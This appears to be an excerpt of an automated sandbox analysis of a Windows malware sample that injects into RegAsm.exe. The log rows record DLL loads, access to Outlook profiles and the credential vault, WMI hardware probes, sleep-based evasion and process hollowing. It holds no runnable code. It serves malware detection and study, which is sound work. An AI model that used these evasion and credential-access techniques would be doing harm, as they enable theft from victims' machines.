                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: VYLigyTDuW.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VYLigyTDuW.exeStatic file information: File size 1956616 > 1048576
                      Source: VYLigyTDuW.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1c8000
                      Source: VYLigyTDuW.exeStatic PE information: real checksum: 0x1decde should be: 0x1df9f2
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_004011ED push ss; retn 0054h0_2_00401249
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_00409313 push esp; ret 0_2_00409315
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0068F800 push esp; ret 0_2_0068F9E2
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0068F9E3 push esp; iretd 0_2_0068FA42
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A1610 push ebp; ret 0_2_022A1611
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A3C0E push ss; ret 0_2_022A3C0F
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A055A pushad ; retf 0_2_022A055B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00440850 push ss; ret 1_2_00440851
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F0C45 push ebx; retf 1_2_010F0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F0C53 push ebx; retf 1_2_010F0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F0C6D push edi; retf 1_2_010F0C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_067FFAF3 push es; ret 1_2_067FFAF4
                      Source: VYLigyTDuW.exeStatic PE information: section name: .text entropy: 6.83339217870378
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4E00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 495Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7368Thread sleep count: 179 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7368Thread sleep time: -179000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7468Thread sleep count: 495 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99877s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7468Thread sleep count: 2516 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99532s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99282s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99157s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -99032s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -98201s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99877Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99032Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98201Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: RegAsm.exe, 00000001.00000002.4159173117.0000000006150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0054B055 mov eax, dword ptr fs:[00000030h]0_2_0054B055
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0054ACFA mov eax, dword ptr fs:[00000030h]0_2_0054ACFA
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0054AD6C mov eax, dword ptr fs:[00000030h]0_2_0054AD6C
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0054AD80 mov eax, dword ptr fs:[00000030h]0_2_0054AD80
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A2DA5 mov eax, dword ptr fs:[00000030h]0_2_022A2DA5
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A3376 mov eax, dword ptr fs:[00000030h]0_2_022A3376
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A6F52 mov eax, dword ptr fs:[00000030h]0_2_022A6F52
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A707B mov eax, dword ptr fs:[00000030h]0_2_022A707B
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A6C8B mov eax, dword ptr fs:[00000030h]0_2_022A6C8B
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A6CEC mov eax, dword ptr fs:[00000030h]0_2_022A6CEC
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A7109 mov eax, dword ptr fs:[00000030h]0_2_022A7109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443C55 mov eax, dword ptr fs:[00000030h]1_2_00443C55
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004438CD mov eax, dword ptr fs:[00000030h]1_2_004438CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443CBD mov eax, dword ptr fs:[00000030h]1_2_00443CBD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443D4B mov eax, dword ptr fs:[00000030h]1_2_00443D4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443921 mov eax, dword ptr fs:[00000030h]1_2_00443921
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044392E mov eax, dword ptr fs:[00000030h]1_2_0044392E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004439A6 mov eax, dword ptr fs:[00000030h]1_2_004439A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004442FD mov ecx, dword ptr fs:[00000030h]1_2_004442FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443AB5 mov eax, dword ptr fs:[00000030h]1_2_00443AB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00443B94 mov eax, dword ptr fs:[00000030h]1_2_00443B94
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000Jump to behavior
